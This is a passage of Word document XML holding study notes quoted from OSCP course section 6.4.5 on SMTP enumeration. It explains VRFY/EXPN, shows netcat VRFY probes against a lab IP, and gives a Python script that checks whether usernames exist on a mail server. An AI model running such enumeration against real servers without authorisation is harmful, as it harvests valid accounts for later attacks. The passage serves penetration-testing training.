      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002787">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 6.4.5. SMTP Enumeration</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">We can also gather information about a host or network from vulnerable mail servers. The</w:t>
      </w:r>
      <w:hyperlink r:id="rId829">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId830">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Simple Mail Transport Protocol</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SMTP) supports several interesting commands, such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VRFY</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. These can often be abused to verify existing users on a mail server, which is useful information during a penetration test. Consider the following example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002788">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002789">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2082800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="113" name="image115.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image115.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83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278A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -nv 192.168.50.8 25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VRFY root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1414"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">VRFY idontexist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can observe how the success and error messages differ. The 252</w:t>
      </w:r>
      <w:hyperlink r:id="rId832">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId833">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SMTP response code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> does not verify the root user exists but will accept and attempt delivery of any messages. Response code 550 indicates the mailbox is unavailable. This procedure can be used to help guess valid usernames in an automated fashion. Next, let's consider the following Python script, which opens a TCP socket, connects to the SMTP server, and issues a VRFY command for a given username:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000278F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002790">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/usr/bin/python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002791">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002792">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002793">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002794">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002795">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">if len(sys.argv) != 3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002796">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        print("Usage: vrfy.py &lt;username&gt; &lt;target_ip&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002797">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        sys.exit(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002798">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002799">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Create a Socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Connect to the Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279D">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ip = sys.argv[2]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279E">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connect = s.connect((ip,25))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000279F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Receive the banner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">banner = s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A3">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">print(banner)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A4">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># VRFY a user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user = (sys.argv[1]).encode()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s.send(b'VRFY ' + user + b'\r\n')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">result = s.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027A9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">print(result)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Close the socket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027AF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B0">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can run the script by providing the username to be tested as a first argument and the target IP as a second argument.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B1">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B2">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1968500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="183" name="image182.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image182.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83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7B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 smtp.py root 192.168.50.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="326"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 smtp.py johndoe 192.168.50.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B5">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
